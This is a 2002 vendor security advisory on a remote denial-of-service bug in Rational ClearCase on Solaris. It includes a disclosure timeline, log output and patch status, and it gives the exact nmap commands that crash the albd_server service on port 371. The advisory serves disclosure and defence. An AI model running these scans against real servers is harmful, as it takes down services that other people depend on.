Guardeonic Solutions AG (

Security Advisory #03-2002

Advisory Name: ClearCase remote DoS
Release Date: 11/22/02
Affected Product: Rational (R) ClearCase (R)
Platform: Solaris 2.5.1 and 8 for sure, other unknown
Version: 4.1 (patches 27, 28) and 2002.05 (patches 9,10)
sure, other unknown

Severity: The ClearCase process listening on TCP port 371
can be crashed by performing a simple nmap scan

Author: Stefan Bagdohn <>
Marek Rouchal <>

Vendor Communication: 09/24/02 Initial Notification via email to
09/24/02 Got vendor receipt via email, this is a
known bug since 07/31/02, From vendors
email: " We have fixed this issue for the
next ClearCase version. A patch is actually
under test for fixing this problem in all
ClearCase version starting 4.1 The patch is
planned to be released in the november
10/15/02 Rational sent three hotfixes (5.0/SUN,
4.1/SUN, 4.2/Redhat)
10/24/02 We tested the patches:
The hotfix for ClearCase 2002.05/Solaris
Sparc works ok, The hotfix for ClearCase
4.1/Solaris Sparc DOES NOT WORK, i.e.
albd_server terminates after a port scan.
Email was sent to vendor asking to fix
it until 10/31 (this year)
10/28/02 Mail from vendor, asking for the exact
patchlevel of the server (and the order
of patches applied)
10/29/02 Provided Rational with the information
11/03/02 Mail to vendor, because there are no patches
available yet!
11/04/02 Answer from Rational: Will be delivered
mid of november (11/14, 11/15 or 11/18)
11/18/02 Rational provides the patch bundle
11/21/02 Tested the patch with following result:
ClearCase 4.1/Solaris Sparc crashes as
seen before.
We are no longer willing to hold back
this advisory as it is A) a serious bug
and B) perhaps a indicator that Rational
is 1) not willing to fix the bug or
2) not able to do so. However, it is
not acceptable.


(From vendors website): ... Rational(R) ClearCase(R), a robust software
artifact management tool. (end of vendor citation)

ClearCase is a version controling, workspace management, build
management and process configuration tool. In short: it can do anything
but making coffee.

The service can easily be crashed by performing a simple tcp portscan
via nmap.


We have seen two different behaviours:

A) When performing a portscan of the target system with nmap the TCP port
371 is show as open. Starting a second scan right after the first one
has finished the port is reported open again, but the process crashes.

B) A second test, scanning only one port, crashes the service with
only performing one scan.


A) Executing

nmap -vvv -O -sT ip.of.clearcase.system

two times will lead to the following message in the logs the of
the clearcase system (/var/adm/atria/log/albd_log):

09/24/02 14:55:23 albd_server(7677): Error: Operation "accept"
failed: Software caused connection abort.
09/24/02 14:55:23 albd_server(7677): Ok: Exiting, status = 0

The service is no longer available afterwards.

B) By executing

nmap -vvv -O -sT -p 371 ip.of.clearcase.system

one time, the services crashed immediately. (Note: nmap cannot
even finish its OS detection.)

Nmap version used was 3.00 on a linux system.


Working patches for ClearCase 2002.05/Solaris Sparc available
from Rational since Nov-14-2002 (clearcase_p2002.05.00-12 and
Solution for 4.1: none!